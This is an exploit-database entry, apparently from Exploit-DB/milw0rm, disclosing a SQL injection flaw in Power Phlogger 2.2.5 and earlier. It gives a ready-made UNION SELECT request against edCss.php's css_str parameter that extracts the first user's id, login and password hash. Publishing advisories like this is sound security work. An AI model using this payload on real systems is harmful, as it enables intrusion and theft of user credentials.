SQL Injection vulnerability in Power Phlogger

vendor:

Power Phlogger

by:

MustLive

8.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Power Phlogger

Affected Version From: Power Phlogger <= 2.2.5

Affected Version To: Power Phlogger <= 2.2.5

Patch Exists: YES

Related CWE: N/A

CPE: a:power_phlogger:power_phlogger

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

SQL Injection vulnerability in Power Phlogger

SQL Injection vulnerability in Power Phlogger (it is PHP/MySQL logging tool via counters). To make SQL Injection attack you need to be logged into your account, which can be freely obtained via open registration form. With this query you will receive id, login and password (hash) of first user.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

############################################################

SQL Injection vulnerability in Power Phlogger

By MustLive (http://websecurity.com.ua)

Detailed information: http://websecurity.com.ua/2158/

Description: SQL Injection vulnerability in Power Phlogger (it is PHP/MySQL logging tool via counters). To make SQL Injection attack you need to be logged into your account, which can be freely obtained via open registration form.
 
SQL Injection:
 
http://site/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pphl_users%20limit%200,1&action=edit
 
With this query you will receive id, login and password (hash) of first user.
 
Vulnerable versions are Power Phlogger <= 2.2.5.
 
############################################################

# milw0rm.com [2008-06-05]